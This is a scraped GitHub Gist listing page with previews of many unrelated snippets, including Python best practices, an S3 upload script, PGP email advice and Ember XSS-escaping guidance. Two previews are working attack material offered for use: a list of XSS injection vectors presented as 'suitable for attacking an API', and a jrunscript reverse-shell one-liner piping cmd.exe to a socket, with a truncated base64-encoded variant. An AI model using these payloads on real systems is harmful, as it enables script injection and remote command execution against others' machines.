A "Best of the Best Practices" (BOBP) guide to developing in Python.
- "Build tools for others that you want to be built for you." - Kenneth Reitz
- "Simplicity is alway better than functionality." - Pieter Hintjens
Rahul Nair 0xrnair
JohannesHoppe
/ 666_lines_of_XSS_vectors.html
Created
May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
sloria
/ bobp-python.md
Last active
June 8, 2024 23:19
A "Best of the Best Practices" (BOBP) guide to developing in Python.
tsiege
/ The Technical Interview Cheat Sheet.md
Last active
June 10, 2024 08:13
This is my technical interview cheat sheet. Feel free to fork it or do whatever you want with it. PLEASE let me know if there are any errors or if anything crucial is missing. I will add more links soon.
I have moved this over to the Tech Interview Cheat Sheet Repo and has been expanded and even has code challenges you can run and practice against!
\
This is a guide on how to email securely.
There are many guides on how to install and use PGP to encrypt email. This is not one of them. This is a guide on secure communication using email with PGP encryption. If you are not familiar with PGP, please read another guide first. If you are comfortable using PGP to encrypt and decrypt emails, this guide will raise your security to the next level.
adam-p
/ Local PR test and merge.md
Last active
February 5, 2024 19:39
Testing a pull request, then merging locally; and avoiding TOCTOU
It's not immediately obvious how to pull down the code for a PR and test it locally. But it's pretty easy. (This assumes you have a remote for the main repo named upstream.)
Getting the PR code
-
Make note of the PR number. For example, Rod's latest is PR #37: Psiphon-Labs/psiphon-tunnel-core#37
-
Fetch the PR's pseudo-branch (or bookmark or rev pointer whatever the word is), and give it a local branch name. Here we'll name it
pr37:
$ git fetch upstream pull/37/head:pr37
chrismdp
/ s3.sh
Last active
March 5, 2024 12:57
Uploading to S3 in 18 lines of Shell (used to upload builds for http://soltrader.net)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine | |
| # This is how I upload my new Sol Trader builds (http://soltrader.net) | |
| # Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash | |
| S3KEY="my aws key" | |
| S3SECRET="my aws secret" # pass these in | |
| function putS3 | |
| { | |
| path=$1 |
iMilnb
/ boto3_hands_on.md
Last active
October 19, 2022 09:15
Programmatically manipulate AWS resources with boto3 - a quick hands on
This documentation aims at being a quick-straight-to-the-point-hands-on AWS resources manipulation with [boto3][0].
First of all, you'll need to install [boto3][0]. Installing it along with [awscli][1] is probably a good idea as
- [awscli][1] is boto-based
- [awscli][1] usage is really close to boto's
In Ember, always use {{...}}, not {{{...}}}. Use Ember.String.htmlSafe as necessary in JavaScript (usually in a component)
to mark markup as HTML-safe. Never pass user-entered content directly to Ember.String.htmlSafe.
Ember has great XSS protection built in. The HTMLBars templating library will automatically run any interpolations through
htmlEscape for you. So
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
CMCDragonkai
/ memory_layout.md
Last active
May 9, 2024 14:12
Linux: Understanding the Memory Layout of Linux Executables
OlderNewer